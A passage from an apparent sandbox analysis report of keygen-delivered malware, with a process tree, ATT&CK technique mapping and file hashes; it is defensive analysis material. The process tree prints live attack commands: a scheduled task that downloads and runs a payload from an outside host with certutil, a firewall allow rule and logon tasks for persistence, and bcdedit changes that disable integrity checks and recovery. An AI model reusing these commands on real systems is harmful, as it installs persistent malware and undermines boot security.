                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:5424
                                        • C:\Users\Admin\AppData\Local\Temp\14C3.exe
                                          C:\Users\Admin\AppData\Local\Temp\14C3.exe
                                          2⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: MapViewOfSection
                                          PID:5632
                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                        1⤵
                                        • Modifies registry class
                                        PID:4832
                                      • C:\Users\Admin\AppData\Local\Temp\1EF6.exe
                                        C:\Users\Admin\AppData\Local\Temp\1EF6.exe
                                        1⤵
                                        • Executes dropped EXE
                                        PID:5528
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          2⤵
                                          • Executes dropped EXE
                                          PID:4584
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          2⤵
                                          • Executes dropped EXE
                                          PID:3936
                                      • C:\Users\Admin\AppData\Local\Temp\304C.exe
                                        C:\Users\Admin\AppData\Local\Temp\304C.exe
                                        1⤵
                                        • Executes dropped EXE
                                        PID:5328
                                        • C:\Users\Admin\AppData\Local\Temp\304C.exe
                                          "C:\Users\Admin\AppData\Local\Temp\304C.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Windows security modification
                                          • Adds Run key to start application
                                          • Drops file in Windows directory
                                          PID:5496
                                          • C:\Windows\System32\cmd.exe
                                            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                            3⤵
                                              PID:4568
                                              • C:\Windows\system32\netsh.exe
                                                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                4⤵
                                                  PID:6012
                                              • C:\Windows\rss\csrss.exe
                                                C:\Windows\rss\csrss.exe /15-15
                                                3⤵
                                                • Executes dropped EXE
                                                • Modifies data under HKEY_USERS
                                                PID:4040
                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                  4⤵
                                                  • Creates scheduled task(s)
                                                  PID:4136
                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                                                  4⤵
                                                  • Creates scheduled task(s)
                                                  PID:5448
                                                • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:5660
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:5372
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:4664
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:5668
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:5792
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:4656
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:4216
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:5376
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:6032
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:5356
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:4896
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:4204
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -timeout 0
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:3704
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:5468
                                                  • C:\Windows\system32\bcdedit.exe
                                                    C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
                                                    5⤵
                                                    • Modifies boot configuration data using bcdedit
                                                    PID:5368
                                                • C:\Windows\System32\bcdedit.exe
                                                  C:\Windows\Sysnative\bcdedit.exe /v
                                                  4⤵
                                                  • Modifies boot configuration data using bcdedit
                                                  PID:4408
                                                • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                  C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                  4⤵
                                                    PID:5696
                                            • C:\Users\Admin\AppData\Local\Temp\34B2.exe
                                              C:\Users\Admin\AppData\Local\Temp\34B2.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:5664
                                            • \??\c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                              1⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              PID:5964
                                            • C:\Users\Admin\AppData\Local\Temp\8E1E.exe
                                              C:\Users\Admin\AppData\Local\Temp\8E1E.exe
                                              1⤵
                                                PID:4316
                                                • C:\Users\Admin\AppData\Local\Temp\8E1E.exe
                                                  C:\Users\Admin\AppData\Local\Temp\8E1E.exe
                                                  2⤵
                                                    PID:4916
                                                    • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                      "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                      3⤵
                                                        PID:5208
                                                        • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                          "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                          4⤵
                                                            PID:3412
                                                    • C:\Users\Admin\AppData\Local\Temp\99A8.exe
                                                      C:\Users\Admin\AppData\Local\Temp\99A8.exe
                                                      1⤵
                                                        PID:5640
                                                      • C:\Users\Admin\AppData\Local\Temp\BDDB.tmp.exe
                                                        C:\Users\Admin\AppData\Local\Temp\BDDB.tmp.exe
                                                        1⤵
                                                          PID:3304
                                                        • C:\Users\Admin\AppData\Local\Temp\BF53.tmp.exe
                                                          C:\Users\Admin\AppData\Local\Temp\BF53.tmp.exe
                                                          1⤵
                                                            PID:5956
                                                          • C:\Users\Admin\AppData\Local\Temp\C36B.tmp.exe
                                                            C:\Users\Admin\AppData\Local\Temp\C36B.tmp.exe
                                                            1⤵
                                                              PID:4244
                                                            • C:\Windows\SysWOW64\explorer.exe
                                                              C:\Windows\SysWOW64\explorer.exe
                                                              1⤵
                                                                PID:5608
                                                              • C:\Windows\explorer.exe
                                                                C:\Windows\explorer.exe
                                                                1⤵
                                                                  PID:2112
                                                                • C:\Users\Admin\AppData\Local\Temp\DF02.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\DF02.exe
                                                                  1⤵
                                                                    PID:5860
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\DF02.exe
                                                                      2⤵
                                                                        PID:2956
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 612
                                                                        2⤵
                                                                        • Program crash
                                                                        PID:5944
                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                      1⤵
                                                                        PID:60
                                                                      • C:\Windows\explorer.exe
                                                                        C:\Windows\explorer.exe
                                                                        1⤵
                                                                          PID:5672
                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                          1⤵
                                                                            PID:5712
                                                                          • C:\Windows\explorer.exe
                                                                            C:\Windows\explorer.exe
                                                                            1⤵
                                                                              PID:5732
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                              1⤵
                                                                                PID:6032
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe
                                                                                1⤵
                                                                                  PID:5916
                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                  1⤵
                                                                                    PID:4980

                                                                                  Network

                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                  Execution

                                                                                  Command-Line Interface

                                                                                  1
                                                                                  T1059

                                                                                  Scheduled Task

                                                                                  1
                                                                                  T1053

                                                                                  Persistence

                                                                                  New Service

                                                                                  1
                                                                                  T1050

                                                                                  Modify Existing Service

                                                                                  1
                                                                                  T1031

                                                                                  Registry Run Keys / Startup Folder

                                                                                  2
                                                                                  T1060

                                                                                  Bootkit

                                                                                  1
                                                                                  T1067

                                                                                  Scheduled Task

                                                                                  1
                                                                                  T1053

                                                                                  Privilege Escalation

                                                                                  New Service

                                                                                  1
                                                                                  T1050

                                                                                  Scheduled Task

                                                                                  1
                                                                                  T1053

                                                                                  Defense Evasion

                                                                                  Disabling Security Tools

                                                                                  2
                                                                                  T1089

                                                                                  Modify Registry

                                                                                  6
                                                                                  T1112

                                                                                  Virtualization/Sandbox Evasion

                                                                                  1
                                                                                  T1497

                                                                                  Impair Defenses

                                                                                  1
                                                                                  T1562

                                                                                  File Permissions Modification

                                                                                  1
                                                                                  T1222

                                                                                  Install Root Certificate

                                                                                  1
                                                                                  T1130

                                                                                  Credential Access

                                                                                  Credentials in Files

                                                                                  4
                                                                                  T1081

                                                                                  Discovery

                                                                                  Query Registry

                                                                                  7
                                                                                  T1012

                                                                                  Virtualization/Sandbox Evasion

                                                                                  1
                                                                                  T1497

                                                                                  System Information Discovery

                                                                                  7
                                                                                  T1082

                                                                                  Peripheral Device Discovery

                                                                                  2
                                                                                  T1120

                                                                                  Remote System Discovery

                                                                                  1
                                                                                  T1018

                                                                                  Collection

                                                                                  Data from Local System

                                                                                  4
                                                                                  T1005

                                                                                  Command and Control

                                                                                  Web Service

                                                                                  1
                                                                                  T1102

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\Program Files (x86)\HappyNewYear\seed.sfx.exe
                                                                                    MD5

                                                                                    5105f53f9cd61fb0845decff0d1b785b

                                                                                    SHA1

                                                                                    1af3947555a2b955e3adac4b2f07ed14522e7d84

                                                                                    SHA256

                                                                                    b8943fc714223b6c3802bbcf298374fa2558977122129d14efcad50a44d97ced

                                                                                    SHA512

                                                                                    5df386a04be7206e55d46321c1016da595ff7cd4af18c41295c3700499bdf0204671bb4b5faf393af3cb7a7b47fa631b508ff801df58b852c04c452f9d1146e8

                                                                                  • C:\Program Files (x86)\HappyNewYear\seed.sfx.exe
                                                                                    MD5

                                                                                    5105f53f9cd61fb0845decff0d1b785b

                                                                                    SHA1

                                                                                    1af3947555a2b955e3adac4b2f07ed14522e7d84

                                                                                    SHA256

                                                                                    b8943fc714223b6c3802bbcf298374fa2558977122129d14efcad50a44d97ced

                                                                                    SHA512

                                                                                    5df386a04be7206e55d46321c1016da595ff7cd4af18c41295c3700499bdf0204671bb4b5faf393af3cb7a7b47fa631b508ff801df58b852c04c452f9d1146e8

                                                                                  • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                                                                                    MD5

                                                                                    d221e60151a0f4af38d7632a08645ee5

                                                                                    SHA1

                                                                                    2cb5e473289cd4e86a2c3b93bf4bc9b23c800fd1

                                                                                    SHA256

                                                                                    57ad792c2b88e32003582f2b8a7eca4ff5a5fd13a691c797dec9cfa2c93a9d97

                                                                                    SHA512

                                                                                    0833936b772400921d1c39b40b84fb6b789ba7a799236114f8a82bf957e7607818fa87aae7847e284c3c9576174c0fa3ccc7a5130c995dd4bd7d2adf4c2562b1

                                                                                  • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                                                                                    MD5

                                                                                    d221e60151a0f4af38d7632a08645ee5

                                                                                    SHA1

                                                                                    2cb5e473289cd4e86a2c3b93bf4bc9b23c800fd1

                                                                                    SHA256

                                                                                    57ad792c2b88e32003582f2b8a7eca4ff5a5fd13a691c797dec9cfa2c93a9d97

                                                                                    SHA512

                                                                                    0833936b772400921d1c39b40b84fb6b789ba7a799236114f8a82bf957e7607818fa87aae7847e284c3c9576174c0fa3ccc7a5130c995dd4bd7d2adf4c2562b1

                                                                                  • C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
                                                                                    MD5

                                                                                    5aad783cbda7ad27a2ddd665959daefb

                                                                                    SHA1

                                                                                    05a0f583f7293a5db7996bf4b3f6c3539d3b457f

                                                                                    SHA256

                                                                                    3c1f7af5e69a599268bcb3343b8609006a255090234d699c77922c95743e9e98

                                                                                    SHA512

                                                                                    dc1c3b8ebf6bbc7ef62c5d72b38342f1a4c832565905b62cc2d24bb7565e1069d8e49de0475b33cc1d327ec13816ee9e0945ab7ee76268ae08bc8e183435ce8c

                                                                                  • C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
                                                                                    MD5

                                                                                    edeb50f0b803732a581ab558bf87d968

                                                                                    SHA1

                                                                                    35858ce564d4c8b080bae606bf67292f5b9b2201

                                                                                    SHA256

                                                                                    ee9743026ad49017735e58c3d9ee9198db87eb6a3ab77242aa9d15155a9504b6

                                                                                    SHA512

                                                                                    8c47a7964791452fc499046d60b08b99f7a986b3827cddeba88b20e91c0ff69475314f17662c33286f421d433fb507a9c673bcce75f0c5bb333ca6e58b219273

                                                                                  • C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
                                                                                    MD5

                                                                                    edeb50f0b803732a581ab558bf87d968

                                                                                    SHA1

                                                                                    35858ce564d4c8b080bae606bf67292f5b9b2201

                                                                                    SHA256

                                                                                    ee9743026ad49017735e58c3d9ee9198db87eb6a3ab77242aa9d15155a9504b6

                                                                                    SHA512

                                                                                    8c47a7964791452fc499046d60b08b99f7a986b3827cddeba88b20e91c0ff69475314f17662c33286f421d433fb507a9c673bcce75f0c5bb333ca6e58b219273

                                                                                  • C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
                                                                                    MD5

                                                                                    edeb50f0b803732a581ab558bf87d968

                                                                                    SHA1

                                                                                    35858ce564d4c8b080bae606bf67292f5b9b2201

                                                                                    SHA256

                                                                                    ee9743026ad49017735e58c3d9ee9198db87eb6a3ab77242aa9d15155a9504b6

                                                                                    SHA512

                                                                                    8c47a7964791452fc499046d60b08b99f7a986b3827cddeba88b20e91c0ff69475314f17662c33286f421d433fb507a9c673bcce75f0c5bb333ca6e58b219273

                                                                                  • C:\Users\Admin\AppData\Local\Temp\MSIA2BE.tmp
                                                                                    MD5

                                                                                    84878b1a26f8544bda4e069320ad8e7d

                                                                                    SHA1

                                                                                    51c6ee244f5f2fa35b563bffb91e37da848a759c

                                                                                    SHA256

                                                                                    809aab5eace34dfbfb2b3d45462d42b34fcb95b415201d0d625414b56e437444

                                                                                    SHA512

                                                                                    4742b84826961f590e0a2d6cc85a60b59ca4d300c58be5d0c33eb2315cefaf5627ae5ed908233ad51e188ce53ca861cf5cf8c1aa2620dc2667f83f98e627b549

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                    MD5

                                                                                    65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                    SHA1

                                                                                    a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                    SHA256

                                                                                    862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                    SHA512

                                                                                    e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                    MD5

                                                                                    65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                    SHA1

                                                                                    a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                    SHA256

                                                                                    862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                    SHA512

                                                                                    e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                    MD5

                                                                                    c615d0bfa727f494fee9ecb3f0acf563

                                                                                    SHA1

                                                                                    6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                    SHA256

                                                                                    95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                    SHA512

                                                                                    d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                    MD5

                                                                                    c615d0bfa727f494fee9ecb3f0acf563

                                                                                    SHA1

                                                                                    6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                    SHA256

                                                                                    95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                    SHA512

                                                                                    d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                    MD5

                                                                                    62d2a07135884c5c8ff742c904fddf56

                                                                                    SHA1

                                                                                    46ce1f7fdf8b4cb2abe479efd5f352db9728a40b

                                                                                    SHA256

                                                                                    a12fee020eb54a0f012545074c689893113d130498d9ad411d5852c786770b81

                                                                                    SHA512

                                                                                    19c4dc3558308052bb13f71ca633ab05d55d57b68fc240fcc6d06e583fa61c5ccea87ef0f8196acc19b37d87deb42e5c204a2a05fce63f1accaf9e39c219f519

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                    MD5

                                                                                    62d2a07135884c5c8ff742c904fddf56

                                                                                    SHA1

                                                                                    46ce1f7fdf8b4cb2abe479efd5f352db9728a40b

                                                                                    SHA256

                                                                                    a12fee020eb54a0f012545074c689893113d130498d9ad411d5852c786770b81

                                                                                    SHA512

                                                                                    19c4dc3558308052bb13f71ca633ab05d55d57b68fc240fcc6d06e583fa61c5ccea87ef0f8196acc19b37d87deb42e5c204a2a05fce63f1accaf9e39c219f519

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                    MD5

                                                                                    38f1d6ddf7e39767157acbb107e03250

                                                                                    SHA1

                                                                                    dcb0d5feacb80c1e4cbb71a30cff7edf10a185e8

                                                                                    SHA256

                                                                                    97ada84ef77a3b45abd2e14caf519e06bbbad5a6ed180aa6ee543e38e9bce796

                                                                                    SHA512

                                                                                    3ba909b5001a3b995ebe8f9dbd4ddb6506a5c66612cf43e94a50f72c543a9aa4828bbba224db807de10076c5e70fabf7cc31bf8e442a3f4cf26d95c7f7094c2d

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                    MD5

                                                                                    38f1d6ddf7e39767157acbb107e03250

                                                                                    SHA1

                                                                                    dcb0d5feacb80c1e4cbb71a30cff7edf10a185e8

                                                                                    SHA256

                                                                                    97ada84ef77a3b45abd2e14caf519e06bbbad5a6ed180aa6ee543e38e9bce796

                                                                                    SHA512

                                                                                    3ba909b5001a3b995ebe8f9dbd4ddb6506a5c66612cf43e94a50f72c543a9aa4828bbba224db807de10076c5e70fabf7cc31bf8e442a3f4cf26d95c7f7094c2d

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                    MD5

                                                                                    f2632c204f883c59805093720dfe5a78

                                                                                    SHA1

                                                                                    c96e3aa03805a84fec3ea4208104a25a2a9d037e

                                                                                    SHA256

                                                                                    f9458a661ecd6c7e8fae669be72497288472a11ac3e823d3074e58f7fe98cd68

                                                                                    SHA512

                                                                                    5a19c4a777899889381be64f190e50a23cceee0abb78776b6d041e2384ba88e692972e40cefa34c03ca1b7d029475a0afbc5ce006ce833a1665e52008671bae2

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
                                                                                    MD5

                                                                                    edeb50f0b803732a581ab558bf87d968

                                                                                    SHA1

                                                                                    35858ce564d4c8b080bae606bf67292f5b9b2201

                                                                                    SHA256

                                                                                    ee9743026ad49017735e58c3d9ee9198db87eb6a3ab77242aa9d15155a9504b6

                                                                                    SHA512

                                                                                    8c47a7964791452fc499046d60b08b99f7a986b3827cddeba88b20e91c0ff69475314f17662c33286f421d433fb507a9c673bcce75f0c5bb333ca6e58b219273

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
                                                                                    MD5

                                                                                    edeb50f0b803732a581ab558bf87d968

                                                                                    SHA1

                                                                                    35858ce564d4c8b080bae606bf67292f5b9b2201

                                                                                    SHA256

                                                                                    ee9743026ad49017735e58c3d9ee9198db87eb6a3ab77242aa9d15155a9504b6

                                                                                    SHA512

                                                                                    8c47a7964791452fc499046d60b08b99f7a986b3827cddeba88b20e91c0ff69475314f17662c33286f421d433fb507a9c673bcce75f0c5bb333ca6e58b219273

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                                                                    MD5

                                                                                    26baf1dd4e0c44975cf943b6d5269b07

                                                                                    SHA1

                                                                                    4648e9a79c7a4fd5be622128ddc5af68697f3121

                                                                                    SHA256

                                                                                    9117de15747527123f93284c821ea2e681b574639112532e66ad37a8246d98c9

                                                                                    SHA512

                                                                                    57adccbf3424849a19291e9e4ec018a4f3b1ca5fbdfedd16592fadae5c7664249eafcff85e916dd2342ab47b6440ac314af63360aaafba1a11c7356c0f27fcef

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                                                                    MD5

                                                                                    26baf1dd4e0c44975cf943b6d5269b07

                                                                                    SHA1

                                                                                    4648e9a79c7a4fd5be622128ddc5af68697f3121

                                                                                    SHA256

                                                                                    9117de15747527123f93284c821ea2e681b574639112532e66ad37a8246d98c9

                                                                                    SHA512

                                                                                    57adccbf3424849a19291e9e4ec018a4f3b1ca5fbdfedd16592fadae5c7664249eafcff85e916dd2342ab47b6440ac314af63360aaafba1a11c7356c0f27fcef

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
                                                                                    MD5

                                                                                    6f3b825f098993be0b5dbd0e42790b15

                                                                                    SHA1

                                                                                    cb6b13faf195f76f064c19d5b1a08b5d0633d3ea

                                                                                    SHA256

                                                                                    c6ee0d49bdb6580c6a972e1b087ba4973984843c94832082cb0454e17386ab2e

                                                                                    SHA512

                                                                                    bff72b5587ce20201e08919456726872aa253eceb7836884995f2807aaf1d6dc9ebd681c3aa6e34a56be18f1f3369bea4876df6836329dd43202103db7b7d34c

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
                                                                                    MD5

                                                                                    6f3b825f098993be0b5dbd0e42790b15

                                                                                    SHA1

                                                                                    cb6b13faf195f76f064c19d5b1a08b5d0633d3ea

                                                                                    SHA256

                                                                                    c6ee0d49bdb6580c6a972e1b087ba4973984843c94832082cb0454e17386ab2e

                                                                                    SHA512

                                                                                    bff72b5587ce20201e08919456726872aa253eceb7836884995f2807aaf1d6dc9ebd681c3aa6e34a56be18f1f3369bea4876df6836329dd43202103db7b7d34c

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\JOzWR.dat
                                                                                    MD5

                                                                                    12476321a502e943933e60cfb4429970

                                                                                    SHA1

                                                                                    c71d293b84d03153a1bd13c560fca0f8857a95a7

                                                                                    SHA256

                                                                                    14a0fbd7eab461e49ee161ac3bd9ad8055086dbe56848dbaba9ec2034b3dea29

                                                                                    SHA512

                                                                                    f222de8febc705146394fd389e6cece95b077a0629e18eab91c49b139bf5b686435e28a6ada4a0dbb951fd24ec3db692e7a5584d57ffd0e851739e595f2bbfdc

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                    MD5

                                                                                    51ef03c9257f2dd9b93bfdd74e96c017

                                                                                    SHA1

                                                                                    3baa7bee4b4b7d3ace13409d69dc7bcd0399ac34

                                                                                    SHA256

                                                                                    82a022b29bda763ef9f2ce01c82c82e199182d1d0243cca9811eccc1d993cecf

                                                                                    SHA512

                                                                                    2c97e5d08c9be89ca45153511e0976abfabf41e25d4187dcb7586ba125b6d8d763b99e79043ac1504203c26c7ab47a9246d9a0235b469f6c611703d4e2ae00e1

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
                                                                                    MD5

                                                                                    51ef03c9257f2dd9b93bfdd74e96c017

                                                                                    SHA1

                                                                                    3baa7bee4b4b7d3ace13409d69dc7bcd0399ac34

                                                                                    SHA256

                                                                                    82a022b29bda763ef9f2ce01c82c82e199182d1d0243cca9811eccc1d993cecf

                                                                                    SHA512

                                                                                    2c97e5d08c9be89ca45153511e0976abfabf41e25d4187dcb7586ba125b6d8d763b99e79043ac1504203c26c7ab47a9246d9a0235b469f6c611703d4e2ae00e1

                                                                                  • C:\Users\Admin\AppData\Local\Temp\download\ATL71.DLL
                                                                                    MD5

                                                                                    79cb6457c81ada9eb7f2087ce799aaa7

                                                                                    SHA1

                                                                                    322ddde439d9254182f5945be8d97e9d897561ae

                                                                                    SHA256

                                                                                    a68e1297fae2bcf854b47ffa444f490353028de1fa2ca713b6cf6cc5aa22b88a

                                                                                    SHA512

                                                                                    eca4b91109d105b2ce8c40710b8e3309c4cc944194843b7930e06daf3d1df6ae85c1b7063036c7e5cd10276e5e5535b33e49930adbad88166228316283d011b8

                                                                                  • C:\Users\Admin\AppData\Local\Temp\download\MSVCP71.dll
                                                                                    MD5

                                                                                    a94dc60a90efd7a35c36d971e3ee7470

                                                                                    SHA1

                                                                                    f936f612bc779e4ba067f77514b68c329180a380

                                                                                    SHA256

                                                                                    6c483cbe349863c7dcf6f8cb7334e7d28c299e7d5aa063297ea2f62352f6bdd9

                                                                                    SHA512

                                                                                    ff6c41d56337cac074582002d60cbc57263a31480c67ee8999bc02fc473b331eefed93ee938718d297877cf48471c7512741b4aebc0636afc78991cdf6eddfab

                                                                                  • C:\Users\Admin\AppData\Local\Temp\download\MSVCR71.dll
                                                                                    MD5

                                                                                    ca2f560921b7b8be1cf555a5a18d54c3

                                                                                    SHA1

                                                                                    432dbcf54b6f1142058b413a9d52668a2bde011d

                                                                                    SHA256

                                                                                    c4d4339df314a27ff75a38967b7569d9962337b8d4cd4b0db3aba5ff72b2bfbb

                                                                                    SHA512

                                                                                    23e0bdd9458a5a8e0f9bbcb7f6ce4f87fcc9e47c1ee15f964c17ff9fe8d0f82dd3a0f90263daaf1ee87fad4a238aa0ee92a16b3e2c67f47c84d575768edba43e

                                                                                  • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                    MD5

